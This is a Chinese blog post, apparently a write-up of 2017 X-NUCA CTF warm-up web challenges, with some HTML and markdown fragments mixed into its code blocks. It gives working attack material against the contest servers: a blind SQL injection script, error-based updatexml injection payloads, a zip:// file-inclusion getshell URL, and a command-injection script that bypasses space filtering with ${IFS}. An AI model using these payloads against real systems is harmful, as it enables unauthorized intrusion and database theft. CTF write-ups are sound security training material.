<li>Payload：<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">-----</span><br><span class="line"></span><br><span class="line"># DrinkCoffee</span><br><span class="line">- 题目url：[http://218.76.35.75:65280/](http://218.76.35.75:65280/)</span><br><span class="line">进去以后有```Hint: Find the password to submit, but you should come from http://www.iie.ac.cn and your IP must be 10.10.20.1</span><br></pre></td></tr></table></figure></li>
</ul>
<p>并在Response header发现有password<br>那很清晰就是修改http header了，这里推荐一个火狐的插件叫：Modify Header<br>修改Referer为<a href="http://www.iie.ac.cn，X-Forward-for为10.10.20.1" target="_blank" rel="noopener">http://www.iie.ac.cn，X-Forward-for为10.10.20.1</a> ，然后把password拿到md5解密网站查找一下，找到密码为cafe，直接post上去即可拿到flag</p>
<hr>
<h1 id="Default"><a href="#Default" class="headerlink" title="Default"></a>Default</h1><ul>
<li>题目url：<a href="http://218.76.35.74:20131/" target="_blank" rel="noopener">http://218.76.35.74:20131</a><br>进去以后啥都没有，根据提示开扫描器直接骚（立个flag，自己写一个扫描器）<br>骚到index2.php<br>访问之后发现有源码，是一个代码注入<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span> <span class="string">"flag2.php"</span>;</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">show_source(<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line">$a = @$_REQUEST[<span class="string">'hello'</span>];</span><br><span class="line"><span class="keyword">eval</span>(<span class="string">"var_dump($a);"</span>);</span><br></pre></td></tr></table></figure>

</li>
</ul>
<p>直接上Payload</p>
<ul>
<li>Payload:<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">------</span><br><span class="line"># Vote</span><br><span class="line">- 题目url：[http://218.76.35.75:65080/](http://218.76.35.75:65080/)</span><br><span class="line">进去以后顺手扫一波，这里推荐一下自家的扫描器，介绍在下一篇文章</span><br><span class="line">扫出备份文件, .index.php.swp后下载查看源码（不知道为什么这里vim -r无法修复文件，所以直接hexdump -C把能读的弄了出来，再用python切片倒叙一下再整理一下逻辑就有了大概的源码了。</span><br><span class="line"></span><br><span class="line">```python</span><br><span class="line">#coding:utf8</span><br><span class="line"></span><br><span class="line">raw = &apos;&apos;&apos;echo &apos;&lt;br&gt;&lt;a href=&quot;index.php&quot;&gt;goBack&lt;/a&gt;&lt;br&gt;&apos;;</span><br><span class="line">echo &apos;&lt;/table&gt;&apos;;</span><br><span class="line">echo &apos;&lt;td&gt;&apos;.$arr[0].&apos;&lt;/td&gt;&lt;td&gt;&apos;.round($arr[1], 2).&apos;&lt;/td&gt;&lt;/tr&gt;&apos;;</span><br><span class="line">$arr = mysql_fetch_array(mysql_query(&quot;SELECT COUNT(value), AVG(value) FROM t_vote WHERE id = &quot;.$r[&apos;id&apos;]));</span><br><span class="line">echo &apos;&lt;tr&gt;&lt;td&gt;&apos;.$arr[0].&apos;&lt;/td&gt;&apos;;</span><br><span class="line">$arr = mysql_fetch_array(mysql_query(&quot;SELECT title FROM t_picture WHERE id = &quot;.$r[&apos;id&apos;]));</span><br><span class="line">while ($r = mysql_fetch_array($q)) &#123;</span><br><span class="line">    echo &apos;&lt;tr&gt;&lt;th&gt;Logo&lt;/th&gt;&lt;th&gt;Total votes&lt;/th&gt;&lt;th&gt;Average&lt;/th&gt;&lt;/tr&gt;&apos;;</span><br><span class="line">    echo &apos;&lt;table border=&quot;1&quot;&gt;&apos;;</span><br><span class="line">    echo &apos;&lt;p&gt;&lt;b&gt;Thank you!&lt;/b&gt; Results:&lt;/p&gt;&apos;;</span><br><span class="line">    </span><br><span class="line">    </span><br><span class="line">    $q = mysql_query(&quot;SELECT id FROM t_vote WHERE user = &apos;&#123;$login&#125;&apos; GROUP BY id&quot;);</span><br><span class="line">    $q = mysql_query(&quot;INSERT INTO t_vote VALUES (&#123;$id&#125;, &#123;$vote&#125;, &apos;&#123;$login&#125;&apos;)&quot;);</span><br><span class="line">    $vote = 1;</span><br><span class="line">    if ($vote &gt; 5 || $vote &lt; 1) $vote = (int) $_POST[&apos;vote&apos;];</span><br><span class="line">    $id = $_POST[&apos;id&apos;];</span><br><span class="line">    die(&apos;please select ...&apos;);</span><br><span class="line">    if (!isset($_POST[&apos;id&apos;], $_POST[&apos;vote&apos;]) || !is_numeric($_POST[&apos;id&apos;])) if (isset($_POST[&apos;submit&apos;])) &#123;</span><br><span class="line">        $login = $_SESSION[&apos;login&apos;];</span><br><span class="line">    &#125;</span><br><span class="line">    $_SESSION[&apos;login&apos;] = &apos;guest&apos;.mt_rand(1e5, 1e6);</span><br><span class="line">    if (!isset($_SESSION[&apos;login&apos;])) &#123;</span><br><span class="line">        session_start();</span><br><span class="line">        include &apos;db.php&apos;; &lt; ?&apos;&apos;&apos;</span><br><span class="line"></span><br><span class="line">arr = raw.split(&apos;\n&apos;)</span><br><span class="line">print &apos;\n&apos;.join(arr[::-1])</span><br></pre></td></tr></table></figure></li>
</ul>
<p>得出大概的源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?</span> </span><br><span class="line"><span class="keyword">include</span> <span class="string">'db.php'</span>; </span><br><span class="line">session_start();</span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">isset</span>($_SESSION[<span class="string">'login'</span>])) &#123;</span><br><span class="line">    $_SESSION[<span class="string">'login'</span>] = <span class="string">'guest'</span>.mt_rand(<span class="number">1e5</span>, <span class="number">1e6</span>);</span><br><span class="line">&#125;</span><br><span class="line">$login = $_SESSION[<span class="string">'login'</span>];</span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">isset</span>($_POST[<span class="string">'id'</span>], $_POST[<span class="string">'vote'</span>]) || !is_numeric($_POST[<span class="string">'id'</span>])) <span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) &#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">'please select ...'</span>);</span><br><span class="line">&#125;</span><br><span class="line">$id = $_POST[<span class="string">'id'</span>];</span><br><span class="line"><span class="keyword">if</span> ($vote &gt; <span class="number">5</span> || $vote &lt; <span class="number">1</span>) $vote = (int) $_POST[<span class="string">'vote'</span>];</span><br><span class="line">$vote = <span class="number">1</span>;</span><br><span class="line">$q = mysql_query(<span class="string">"INSERT INTO t_vote VALUES (&#123;$id&#125;, &#123;$vote&#125;, '&#123;$login&#125;')"</span>);</span><br><span class="line">$q = mysql_query(<span class="string">"SELECT id FROM t_vote WHERE user = '&#123;$login&#125;' GROUP BY id"</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">'&lt;p&gt;&lt;b&gt;Thank you!&lt;/b&gt; Results:&lt;/p&gt;'</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'&lt;table border="1"&gt;'</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'&lt;tr&gt;&lt;th&gt;Logo&lt;/th&gt;&lt;th&gt;Total votes&lt;/th&gt;&lt;th&gt;Average&lt;/th&gt;&lt;/tr&gt;'</span>;</span><br><span class="line"><span class="keyword">while</span> ($r = mysql_fetch_array($q)) &#123;</span><br><span class="line">    $arr = mysql_fetch_array(mysql_query(<span class="string">"SELECT title FROM t_picture WHERE id = "</span>.$r[<span class="string">'id'</span>]));</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">'&lt;tr&gt;&lt;td&gt;'</span>.$arr[<span class="number">0</span>].<span class="string">'&lt;/td&gt;'</span>;</span><br><span class="line">    $arr = mysql_fetch_array(mysql_query(<span class="string">"SELECT COUNT(value), AVG(value) FROM t_vote WHERE id = "</span>.$r[<span class="string">'id'</span>]));</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">'&lt;td&gt;'</span>.$arr[<span class="number">0</span>].<span class="string">'&lt;/td&gt;&lt;td&gt;'</span>.round($arr[<span class="number">1</span>], <span class="number">2</span>).<span class="string">'&lt;/td&gt;&lt;/tr&gt;'</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'&lt;/table&gt;'</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'&lt;br&gt;&lt;a href="index.php"&gt;goBack&lt;/a&gt;&lt;br&gt;'</span>;</span><br></pre></td></tr></table></figure>

<p>可以审计代码发现疑似是二次注入，利用的是id字段，这里有个小技巧就是利用hex来绕过is_numeric的检测<br>经过测试是没问题的，但是猜测可能id字段长度有限。。。。所以去information_schema.tables里面注入不了东西 被截断了<br>然后只能猜表名了。。。<br>最后猜到是t_flag表 字段为flag</p>
<p><img src="http://upload-images.jianshu.io/upload_images/6949366-675ebb166087b0d0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="poc"></p>
<p>最后吐槽一下这题提示有点少。。。。。</p>
<hr>
<h1 id="Document"><a href="#Document" class="headerlink" title="Document"></a>Document</h1><ul>
<li><p>题目url：<a href="http://218.76.35.74:20129/" target="_blank" rel="noopener">http://218.76.35.74:20129</a><br>进去之后查看源码发现有inlude.php提示<br>进去include.php查看源码发现此文件有file参数和有upload.php的提升<br>猜测这个文件是用来文件包含的，进去upload.php发现是个上传，那问题很清晰了， upload.php上传shell–&gt;include.php包含执行命令的文件–&gt;getshell</p>
</li>
<li><p>然后测试include.php发现php伪协议是可以用的<br>读取源码<br>upload.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">&lt;form action=<span class="string">""</span> enctype=<span class="string">"multipart/form-data"</span> method=<span class="string">"post"</span> </span><br><span class="line">name=<span class="string">"upload"</span>&gt;file:&lt;input type=<span class="string">"file"</span> name=<span class="string">"file"</span> /&gt;&lt;br&gt; </span><br><span class="line">&lt;input type=<span class="string">"submit"</span> value=<span class="string">"upload"</span> /&gt;&lt;/form&gt;</span><br><span class="line"></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">empty</span>($_FILES[<span class="string">"file"</span>]))</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">echo</span> $_FILES[<span class="string">"file"</span>];</span><br><span class="line">    $allowedExts = <span class="keyword">array</span>(<span class="string">"gif"</span>, <span class="string">"jpeg"</span>, <span class="string">"jpg"</span>, <span class="string">"png"</span>);</span><br><span class="line">    @$temp = explode(<span class="string">"."</span>, $_FILES[<span class="string">"file"</span>][<span class="string">"name"</span>]);</span><br><span class="line">    $extension = end($temp);</span><br><span class="line">    <span class="keyword">if</span> (((@$_FILES[<span class="string">"file"</span>][<span class="string">"type"</span>] == <span class="string">"image/gif"</span>) || (@$_FILES[<span class="string">"file"</span>][<span class="string">"type"</span>] == <span class="string">"image/jpeg"</span>)</span><br><span class="line">    || (@$_FILES[<span class="string">"file"</span>][<span class="string">"type"</span>] == <span class="string">"image/jpg"</span>) || (@$_FILES[<span class="string">"file"</span>][<span class="string">"type"</span>] == <span class="string">"image/pjpeg"</span>)</span><br><span class="line">    || (@$_FILES[<span class="string">"file"</span>][<span class="string">"type"</span>] == <span class="string">"image/x-png"</span>) || (@$_FILES[<span class="string">"file"</span>][<span class="string">"type"</span>] == <span class="string">"image/png"</span>))</span><br><span class="line">    &amp;&amp; (@$_FILES[<span class="string">"file"</span>][<span class="string">"size"</span>] &lt; <span class="number">102400</span>) &amp;&amp; in_array($extension, $allowedExts))</span><br><span class="line">    &#123;</span><br><span class="line">        move_uploaded_file($_FILES[<span class="string">"file"</span>][<span class="string">"tmp_name"</span>], <span class="string">"upload/"</span> . $_FILES[<span class="string">"file"</span>][<span class="string">"name"</span>]);</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">"file upload successful!Save in:  "</span> . <span class="string">"upload/"</span> . $_FILES[<span class="string">"file"</span>][<span class="string">"name"</span>];</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">"upload failed!"</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

</li>
</ul>
<p>include.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">Tips: the parameter is file! :) </span><br><span class="line">&lt;!-- upload.php --&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    @$file = $_GET[<span class="string">"file"</span>];</span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">isset</span>($file))</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> (preg_match(<span class="string">'/http|data|ftp|input|%00/i'</span>, $file) || strstr($file,<span class="string">".."</span>) !== <span class="keyword">FALSE</span> || strlen($file)&gt;=<span class="number">70</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">"&lt;p&gt; error! &lt;/p&gt;"</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">include</span>($file.<span class="string">'.php'</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>发现并没有过滤zip或者phar协议<br>可以选择上传压缩包并用伪协议解压</p>
<ul>
<li>最后getshell payload如下：<br>url+?file=zip://upload/shell.jpg%23shell&amp;pp=(命令写这)</li>
</ul>
<p>这题有点坑的是不知道是谁写了个假flag在upload里面。。大家改得不亦悦乎23333333<br>我以为flag已经被改掉了</p>
<p>结果最后还是自己太菜了。。。<br>命令上find / | grep flag<br>能在/etc/.sshkey/flag.txt下找到flag<br>23333还是挺好玩的</p>
<hr>
<h1 id="阳光总在风雨后"><a href="#阳光总在风雨后" class="headerlink" title="阳光总在风雨后"></a>阳光总在风雨后</h1><ul>
<li>题目url：<a href="http://218.76.35.74:20130/" target="_blank" rel="noopener">http://218.76.35.74:20130</a><br>进去以后是个简单的登陆界面，扫一扫发现有admin目录（再次打广告 我刚刚撸的一个扫描器不错 在下一篇文章有介绍）然后就猜测是要注入登陆进去，日常输入admin、admin后发现提示密码错误，那就很明显是一个盲注了，然后这题还过滤了很多字符</li>
</ul>
<p>如：and、or、|、空格、union、information、…..<br>这题有点坑。。过滤了information….也就是说表名要自己猜。。<br>最后猜到是admin<br>直接上脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding:utf8</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">se = requests.Session()</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'1\'%%(ascii(mid((select(group_concat(passwd))from(admin))from(%d)))=%d)%%\'1'</span></span><br><span class="line">passwd = <span class="string">''</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> x <span class="keyword">in</span> xrange(<span class="number">1</span>,<span class="number">34</span>):</span><br><span class="line">	<span class="keyword">for</span> y <span class="keyword">in</span> xrange(<span class="number">33</span>,<span class="number">127</span>):</span><br><span class="line">		res = se.post(<span class="string">'http://218.76.35.74:20130/login.php'</span>,data=&#123;<span class="string">'uname'</span>:payload % (x,y), <span class="string">'passwd'</span> : <span class="string">'fuck'</span>&#125;)</span><br><span class="line">		<span class="keyword">if</span> <span class="string">'password error!!'</span> <span class="keyword">in</span> res.content:</span><br><span class="line">			<span class="keyword">print</span> chr(y)</span><br><span class="line">			passwd += chr(y)</span><br><span class="line">			<span class="keyword">break</span></span><br><span class="line">		<span class="keyword">else</span>:</span><br><span class="line">			<span class="keyword">print</span> payload % (x,y)</span><br><span class="line">	<span class="keyword">print</span> <span class="string">'[*] passwd = '</span> + passwd</span><br><span class="line"><span class="keyword">print</span> <span class="string">'[*] passwd = '</span> + passwd</span><br></pre></td></tr></table></figure>

<p>跑出来密码是：<br>50f87a3a3ad48e26a5d9058418fb78b5</p>
<p>去cmd5碰撞</p>
<p><img src="http://upload-images.jianshu.io/upload_images/6949366-abcdbbb953d015e3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="result"></p>
<p>拿admin、shuangshuang登陆进去之后是一个命令执行的界面</p>
<p><img src="http://upload-images.jianshu.io/upload_images/6949366-7822cac54a23df2a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="命令执行"></p>
<p>ls一下发现只有index.php<br>ls ../admin发现没有结果<br>猜测是把空格过滤了，试试系统变量${IFS}可以绕过，然后尝试读取上一级目录发现只有login.php回显，不对劲，因为上一级目录是肯定存在index.php的，这里猜测是后台只截取了最后一行的输出，那这里可以使用head命令输出第一行<br>命令执行绕过<a href="http://blog.csdn.net/qq_27446553/article/details/73927518" target="_blank" rel="noopener">http://blog.csdn.net/qq_27446553/article/details/73927518</a></p>
<p>这里偷个懒直接写脚本了。。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding:utf8</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">se = requests.Session()</span><br><span class="line">cookie = &#123;<span class="string">'PHPSESSID'</span> : <span class="string">'5cpbv7knav0mfshnmn5a2u3ku4'</span>&#125;</span><br><span class="line">url = <span class="string">'http://218.76.35.74:20130/admin/index.php'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> x <span class="keyword">in</span> xrange(<span class="number">1</span>,<span class="number">30</span>):</span><br><span class="line">	payload = <span class="string">r'find$&#123;IFS&#125;/$&#123;IFS&#125;|grep$&#123;IFS&#125;flag|head$&#123;IFS&#125;-n$&#123;IFS&#125;'</span> + str(x)</span><br><span class="line">	res = se.post(url,cookies=cookie,data=&#123;<span class="string">'ord'</span> : payload&#125;)</span><br><span class="line">	feedback = re.findall(<span class="string">r'&lt;div class="login-content"&gt;.*&lt;p&gt;(.*)&lt;/br&gt;命令执行完成！.*'</span>,res.content, re.M|re.S)</span><br><span class="line">	<span class="keyword">print</span> feedback[<span class="number">0</span>].strip()</span><br></pre></td></tr></table></figure>

<p><img src="http://upload-images.jianshu.io/upload_images/6949366-c526426b2aa5db27.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="flag"></p>
<p>这个有点可疑<br>cat之后出flag</p>
<p><img src="http://upload-images.jianshu.io/upload_images/6949366-8c0a4bb64daf5e30.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="poc"></p>
<hr>
<h1 id="试试XSS"><a href="#试试XSS" class="headerlink" title="试试XSS"></a>试试XSS</h1><ul>
<li>题目url：<a href="http://218.76.35.75:20125/" target="_blank" rel="noopener">http://218.76.35.75:20125</a><br>这题很粗暴，直接XSS<br>不多说直接上poc</li>
</ul>
<p><img src="http://upload-images.jianshu.io/upload_images/6949366-0960f036ee57ca55.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="poc1"></p>
<p><img src="http://upload-images.jianshu.io/upload_images/6949366-d3227d5a5506f4dc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="poc2"></p>
<p>这题要吐槽的是下面的payload不行。。。？？why？？？</p>
<figure class="highlight plain"><figcaption><span>onerror</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">-----</span><br><span class="line"># http头注入</span><br><span class="line">- 题目url：[http://218.76.35.75:20121](http://218.76.35.75:20121/)</span><br><span class="line">进去之后又提示，修改http头，点击link进入之后Fuzz出Referer存在注入，估计是insert的注入，一般来说是基于时间的盲注和报错注入，这里我选择比较简单快捷的报错注入，具体payload估计已经烂大街了，如下：</span><br><span class="line">```sql</span><br><span class="line">http://1&apos; || 1=(updatexml(1,concat(0x3a,(查询语句)),1)) || &apos;</span><br></pre></td></tr></table></figure>

<p>结果如下：<br>库名：<figure class="highlight plain"><figcaption><span>and 1</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ctfweb20110</span><br><span class="line">表名：```http://1&apos; and 1=(updatexml(1,concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema = &apos;ctfweb20110&apos;)),1)) and &apos;</span><br></pre></td></tr></table></figure></p>
<p>flag,visits<br>字段名：<figure class="highlight plain"><figcaption><span>and 1</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">id,flag</span><br><span class="line">查flag：```http://1&apos; and 1=(updatexml(1,concat(0x3a,(select flag from flag)),1)) and &apos;</span><br></pre></td></tr></table></figure></p>
<hr>
<h1 id="最安全的笔记管理系统"><a href="#最安全的笔记管理系统" class="headerlink" title="最安全的笔记管理系统"></a>最安全的笔记管理系统</h1><ul>
<li>题目url：<a href="http://218.76.35.74:20128/" target="_blank" rel="noopener">http://218.76.35.74:20128</a></li>
</ul>
<hr>
<p>……<br>待更新（不更新了）</p>

      
      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2017/08/14/2017X-nuca-赛前热身Writeup/">[2017X-nuca] 赛前热身Writeup</a></p>
        <p><span>文章作者:</span><a href="/" title="访问 Pr0ph3t 的个人博客">Pr0ph3t</a></p>
        <p><span>发布时间:</span>2017年08月14日 - 16时38分</p>
        <p><span>最后更新:</span>2019年07月06日 - 17时54分</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2017/08/14/2017X-nuca-赛前热身Writeup/" title="[2017X-nuca] 赛前热身Writeup">https://blog.pr0ph3t.com/2017/08/14/2017X-nuca-赛前热身Writeup/</a>
            <span class="copy-path" data-clipboard-text="原文: https://blog.pr0ph3t.com/2017/08/14/2017X-nuca-赛前热身Writeup/　　作者: Pr0ph3t" title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script src="/js/clipboard.min.js"></script>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/cn/" title="中国大陆 (CC BY-NC-SA 3.0 CN)" target = "_blank">"署名-非商用-相同方式共享 3.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



<nav id="article-nav">
  
    <a href="/2017/08/15/XMAN-线下赛总结/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption"><</strong>
      <div class="article-nav-title">
        
          [XMAN] 线下赛总结
        
      </div>
    </a>
  
  
</nav>

  
</article>

    <div id="toc" class="toc-article">
    <strong class="toc-title">文章目录</strong>
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#捉迷藏"><span class="toc-number">1.</span> <span class="toc-text">捉迷藏</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#简单的文件上传"><span class="toc-number">2.</span> <span class="toc-text">简单的文件上传</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#简单的JS"><span class="toc-number">3.</span> <span class="toc-text">简单的JS</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#GG"><span class="toc-number">4.</span> <span class="toc-text">GG</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Reappear"><span class="toc-number">5.</span> <span class="toc-text">Reappear</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Default"><span class="toc-number">6.</span> <span class="toc-text">Default</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Document"><span class="toc-number">7.</span> <span class="toc-text">Document</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#阳光总在风雨后"><span class="toc-number">8.</span> <span class="toc-text">阳光总在风雨后</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#试试XSS"><span class="toc-number">9.</span> <span class="toc-text">试试XSS</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#最安全的笔记管理系统"><span class="toc-number">10.</span> <span class="toc-text">最安全的笔记管理系统</span></a></li></ol>
</div>
<input type="button" id="tocButton" value="隐藏目录"  title="点击按钮隐藏或者显示文章目录">

<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
<script>
    var valueHide = "隐藏目录";
    var valueShow = "显示目录";

    if ($(".left-col").is(":hidden")) {
        $("#tocButton").attr("value", valueShow);
    }
    $("#tocButton").click(function() {
        if ($("#toc").is(":hidden")) {
            $("#tocButton").attr("value", valueHide);
            $("#toc").slideDown(320);
        }
        else {
            $("#tocButton").attr("value", valueShow);
            $("#toc").slideUp(350);
        }
    })
    if ($(".toc").length < 1) {
        $("#toc, #tocButton").hide();
    }
</script>







    



    <div class="scroll" id="post-nav-button">
        
            <a href="/2017/08/15/XMAN-线下赛总结/" title="上一篇: [XMAN] 线下赛总结">
                <i class="fa fa-angle-left"></i>
            </a>
        
        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>
        
            <a href="/" title="回到主页"><i class="fa fa-home"></i></a>
        
    </div>
